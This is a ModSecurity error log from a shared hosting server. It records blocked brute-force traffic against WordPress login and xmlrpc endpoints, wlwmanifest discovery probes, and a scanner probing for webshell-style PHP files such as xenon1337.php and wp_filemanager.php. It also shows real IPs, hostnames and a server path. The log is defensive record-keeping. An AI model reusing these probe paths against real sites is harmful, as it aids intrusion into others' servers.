[Tue May 26 14:27:28.275499 2026] [security2:error] [pid 606909:tid 606994] [remote 18.190.7.192:58560] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVgeF0yRtX9qA7aVUVrGgAAzFQ"]
[Tue May 26 14:27:30.511544 2026] [security2:error] [pid 606909:tid 607129] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgel0yRtX9qA7aVUVrKwAAAN8"]
[Tue May 26 14:27:32.082838 2026] [security2:error] [pid 606909:tid 607057] [client 202.141.83.254:19937] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgfF0yRtX9qA7aVUVrRgAAAJc"]
[Tue May 26 14:27:32.082972 2026] [security2:error] [pid 606909:tid 607057] [client 202.141.83.254:19937] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgfF0yRtX9qA7aVUVrRgAAAJc"]
[Tue May 26 14:27:32.388133 2026] [security2:error] [pid 610693:tid 610892] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgezvNO3hpmlY6M8Rj9wAAAEU"]
[Tue May 26 14:27:34.558779 2026] [security2:error] [pid 610693:tid 610838] [client 154.161.32.97:56472] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVgfTvNO3hpmlY6M8RkFQAAAA8"]
[Tue May 26 14:27:34.798361 2026] [security2:error] [pid 610693:tid 610920] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgfjvNO3hpmlY6M8RkHAAAAGE"]
[Tue May 26 14:27:36.667967 2026] [security2:error] [pid 610693:tid 610899] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVggDvNO3hpmlY6M8RkNAAAAEw"]
[Tue May 26 14:27:37.011953 2026] [ssl:error] [pid 606909:tid 607156] [client 54.86.115.253:37520] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname proxuber.glorodavionics.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 14:27:38.766578 2026] [security2:error] [pid 610693:tid 610918] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVggjvNO3hpmlY6M8RkZQAAAF8"]
[Tue May 26 14:27:40.187037 2026] [security2:error] [pid 610693:tid 610829] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVggzvNO3hpmlY6M8RkfAAAAAY"]
[Tue May 26 14:27:42.692819 2026] [security2:error] [pid 610693:tid 610855] [client 202.141.83.254:53958] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVghjvNO3hpmlY6M8RkvQAAACA"]
[Tue May 26 14:27:42.692956 2026] [security2:error] [pid 610693:tid 610855] [client 202.141.83.254:53958] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVghjvNO3hpmlY6M8RkvQAAACA"]
[Tue May 26 14:27:42.906551 2026] [security2:error] [pid 610693:tid 610932] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVghjvNO3hpmlY6M8RkvAAAAG0"]
[Tue May 26 14:27:44.101740 2026] [security2:error] [pid 606909:tid 607020] [remote 74.7.241.58:42506] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVgiF0yRtX9qA7aVUVrpgAAoW4"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/sv
[Tue May 26 14:27:45.096824 2026] [security2:error] [pid 610693:tid 610891] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgiDvNO3hpmlY6M8Rk2QAAAEQ"]
[Tue May 26 14:27:47.017502 2026] [security2:error] [pid 610693:tid 610839] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgijvNO3hpmlY6M8Rk_gAAABA"]
[Tue May 26 14:27:47.633369 2026] [security2:error] [pid 606909:tid 607062] [client 74.249.212.138:26610] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in.svijaykumar.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVgi10yRtX9qA7aVUVrugAAAJw"]
[Tue May 26 14:27:47.633512 2026] [security2:error] [pid 606909:tid 607062] [client 74.249.212.138:26610] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in.svijaykumar.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVgi10yRtX9qA7aVUVrugAAAJw"]
[Tue May 26 14:27:47.781431 2026] [security2:error] [pid 610693:tid 610876] [client 167.71.246.78:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "lmialumni.org"] [uri "/index.php"] [unique_id "ahVgizvNO3hpmlY6M8RlFQAAADU"]
[Tue May 26 14:27:48.484499 2026] [security2:error] [pid 610693:tid 610895] [client 74.249.212.138:12261] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in.svijaykumar.in"] [uri "/x.php"] [unique_id "ahVgjDvNO3hpmlY6M8RlMwAAAEg"]
[Tue May 26 14:27:48.484610 2026] [security2:error] [pid 610693:tid 610895] [client 74.249.212.138:12261] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in.svijaykumar.in"] [uri "/x.php"] [unique_id "ahVgjDvNO3hpmlY6M8RlMwAAAEg"]
[Tue May 26 14:27:48.643899 2026] [security2:error] [pid 610693:tid 610863] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgjDvNO3hpmlY6M8RlJwAAACg"]
[Tue May 26 14:27:48.917182 2026] [security2:error] [pid 610693:tid 610914] [client 98.184.204.242:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgjDvNO3hpmlY6M8RlMgAAAFs"]
[Tue May 26 14:27:49.931748 2026] [security2:error] [pid 610693:tid 610934] [client 154.161.32.97:56473] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVgjTvNO3hpmlY6M8RlUgAAAG8"]
[Tue May 26 14:27:50.063762 2026] [security2:error] [pid 606909:tid 607130] [client 45.154.98.38:56433] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mail.pronumbers.com.au"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahVgjl0yRtX9qA7aVUVr1wAAAOA"]
[Tue May 26 14:27:50.536683 2026] [security2:error] [pid 610693:tid 610843] [client 45.154.98.38:56611] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 38.98.154.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mail.pronumbers.com.au"] [uri "/xmlrpc.php"] [unique_id "ahVgjjvNO3hpmlY6M8RlWgAAABQ"]
[Tue May 26 14:27:50.810841 2026] [security2:error] [pid 610693:tid 610854] [client 45.154.98.38:56714] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mail.pronumbers.com.au"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVgjjvNO3hpmlY6M8RlXwAAAB8"]
[Tue May 26 14:27:51.085402 2026] [security2:error] [pid 606909:tid 607163] [client 45.154.98.38:56791] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mail.pronumbers.com.au"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVgj10yRtX9qA7aVUVr5AAAAQE"]
[Tue May 26 14:27:51.376571 2026] [security2:error] [pid 606909:tid 607124] [client 45.154.98.38:56911] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mail.pronumbers.com.au"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahVgj10yRtX9qA7aVUVr5gAAANo"]
[Tue May 26 14:27:51.400747 2026] [security2:error] [pid 610693:tid 610942] [client 74.249.212.138:14465] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in.svijaykumar.in"] [uri "/201.php"] [unique_id "ahVgjzvNO3hpmlY6M8RlbQAAAHc"]
[Tue May 26 14:27:51.400851 2026] [security2:error] [pid 610693:tid 610942] [client 74.249.212.138:14465] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in.svijaykumar.in"] [uri "/201.php"] [unique_id "ahVgjzvNO3hpmlY6M8RlbQAAAHc"]
[Tue May 26 14:27:51.656610 2026] [security2:error] [pid 610693:tid 610914] [client 45.154.98.38:56976] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mail.pronumbers.com.au"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVgjzvNO3hpmlY6M8RldAAAAFs"]
[Tue May 26 14:27:51.939258 2026] [security2:error] [pid 610693:tid 610910] [client 45.154.98.38:57057] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mail.pronumbers.com.au"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahVgjzvNO3hpmlY6M8RldgAAAFc"]
[Tue May 26 14:27:52.222999 2026] [security2:error] [pid 610693:tid 610873] [client 45.154.98.38:57186] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mail.pronumbers.com.au"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahVgkDvNO3hpmlY6M8RlegAAADI"]
[Tue May 26 14:27:52.514721 2026] [security2:error] [pid 606909:tid 607101] [client 45.154.98.38:57303] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mail.pronumbers.com.au"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVgkF0yRtX9qA7aVUVr6wAAAMM"]
[Tue May 26 14:27:52.793855 2026] [security2:error] [pid 610693:tid 610904] [client 45.154.98.38:57402] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mail.pronumbers.com.au"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVgkDvNO3hpmlY6M8RliQAAAFE"]
[Tue May 26 14:27:52.993574 2026] [security2:error] [pid 610693:tid 610930] [client 202.141.83.254:19813] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgkDvNO3hpmlY6M8RliwAAAGs"]
[Tue May 26 14:27:52.994239 2026] [security2:error] [pid 610693:tid 610930] [client 202.141.83.254:19813] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgkDvNO3hpmlY6M8RliwAAAGs"]
[Tue May 26 14:27:53.071896 2026] [security2:error] [pid 610693:tid 610876] [client 45.154.98.38:57502] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mail.pronumbers.com.au"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVgkTvNO3hpmlY6M8RljwAAADU"]
[Tue May 26 14:27:53.193438 2026] [security2:error] [pid 610693:tid 610907] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgkDvNO3hpmlY6M8RliAAAAFQ"]
[Tue May 26 14:27:53.360417 2026] [security2:error] [pid 610693:tid 610867] [client 45.154.98.38:57580] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mail.pronumbers.com.au"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahVgkTvNO3hpmlY6M8RlnAAAACw"]
[Tue May 26 14:27:53.636828 2026] [security2:error] [pid 606909:tid 607122] [client 45.154.98.38:57683] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mail.pronumbers.com.au"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVgkV0yRtX9qA7aVUVr8QAAANg"]
[Tue May 26 14:27:53.922183 2026] [security2:error] [pid 610693:tid 610936] [client 45.154.98.38:57794] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mail.pronumbers.com.au"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVgkTvNO3hpmlY6M8RlqQAAAHE"]
[Tue May 26 14:27:54.778222 2026] [security2:error] [pid 610693:tid 610949] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgkjvNO3hpmlY6M8RlrwAAAH4"]
[Tue May 26 14:27:55.891199 2026] [security2:error] [pid 610693:tid 610881] [client 74.249.212.138:12237] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in.svijaykumar.in"] [uri "/ops.php"] [unique_id "ahVgkzvNO3hpmlY6M8RlwAAAADo"]
[Tue May 26 14:27:55.891379 2026] [security2:error] [pid 610693:tid 610881] [client 74.249.212.138:12237] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in.svijaykumar.in"] [uri "/ops.php"] [unique_id "ahVgkzvNO3hpmlY6M8RlwAAAADo"]
[Tue May 26 14:27:56.789359 2026] [security2:error] [pid 610693:tid 610844] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVglDvNO3hpmlY6M8RlwwAAABU"]
[Tue May 26 14:27:57.489144 2026] [security2:error] [pid 610693:tid 610902] [client 74.249.212.138:27392] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in.svijaykumar.in"] [uri "/samll.php"] [unique_id "ahVglTvNO3hpmlY6M8Rl1AAAAE8"]
[Tue May 26 14:27:57.489265 2026] [security2:error] [pid 610693:tid 610902] [client 74.249.212.138:27392] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in.svijaykumar.in"] [uri "/samll.php"] [unique_id "ahVglTvNO3hpmlY6M8Rl1AAAAE8"]
[Tue May 26 14:27:57.530129 2026] [security2:error] [pid 606909:tid 607119] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVglV0yRtX9qA7aVUVsJAAAANU"]
[Tue May 26 14:28:00.112161 2026] [security2:error] [pid 606909:tid 607106] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgl10yRtX9qA7aVUVsRgAAAMg"]
[Tue May 26 14:28:01.295793 2026] [security2:error] [pid 610693:tid 610890] [client 74.249.212.138:11850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in.svijaykumar.in"] [uri "/ingfo.php"] [unique_id "ahVgmTvNO3hpmlY6M8Rl_QAAAEM"]
[Tue May 26 14:28:01.295914 2026] [security2:error] [pid 610693:tid 610890] [client 74.249.212.138:11850] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in.svijaykumar.in"] [uri "/ingfo.php"] [unique_id "ahVgmTvNO3hpmlY6M8Rl_QAAAEM"]
[Tue May 26 14:28:01.594119 2026] [security2:error] [pid 610693:tid 610922] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgmTvNO3hpmlY6M8Rl_AAAAGM"]
[Tue May 26 14:28:02.134373 2026] [security2:error] [pid 610693:tid 610902] [client 74.249.212.138:27030] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in.svijaykumar.in"] [uri "/c55cdler.php"] [unique_id "ahVgmjvNO3hpmlY6M8RmCgAAAE8"]
[Tue May 26 14:28:02.134486 2026] [security2:error] [pid 610693:tid 610902] [client 74.249.212.138:27030] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in.svijaykumar.in"] [uri "/c55cdler.php"] [unique_id "ahVgmjvNO3hpmlY6M8RmCgAAAE8"]
[Tue May 26 14:28:03.000714 2026] [security2:error] [pid 606909:tid 607140] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgml0yRtX9qA7aVUVsawAAAOo"]
[Tue May 26 14:28:03.120408 2026] [security2:error] [pid 606909:tid 607149] [client 74.249.212.138:27035] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in.svijaykumar.in"] [uri "/error_log.php"] [unique_id "ahVgm10yRtX9qA7aVUVscAAAAPM"]
[Tue May 26 14:28:03.120508 2026] [security2:error] [pid 606909:tid 607149] [client 74.249.212.138:27035] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in.svijaykumar.in"] [uri "/error_log.php"] [unique_id "ahVgm10yRtX9qA7aVUVscAAAAPM"]
[Tue May 26 14:28:03.377402 2026] [security2:error] [pid 610693:tid 610926] [client 202.141.83.254:19725] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgmzvNO3hpmlY6M8RmGAAAAGc"]
[Tue May 26 14:28:03.377527 2026] [security2:error] [pid 610693:tid 610926] [client 202.141.83.254:19725] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgmzvNO3hpmlY6M8RmGAAAAGc"]
[Tue May 26 14:28:03.967114 2026] [security2:error] [pid 606909:tid 607055] [client 74.249.212.138:14475] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in.svijaykumar.in"] [uri "/xenon1337.php"] [unique_id "ahVgm10yRtX9qA7aVUVsfQAAAJU"]
[Tue May 26 14:28:03.967257 2026] [security2:error] [pid 606909:tid 607055] [client 74.249.212.138:14475] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in.svijaykumar.in"] [uri "/xenon1337.php"] [unique_id "ahVgm10yRtX9qA7aVUVsfQAAAJU"]
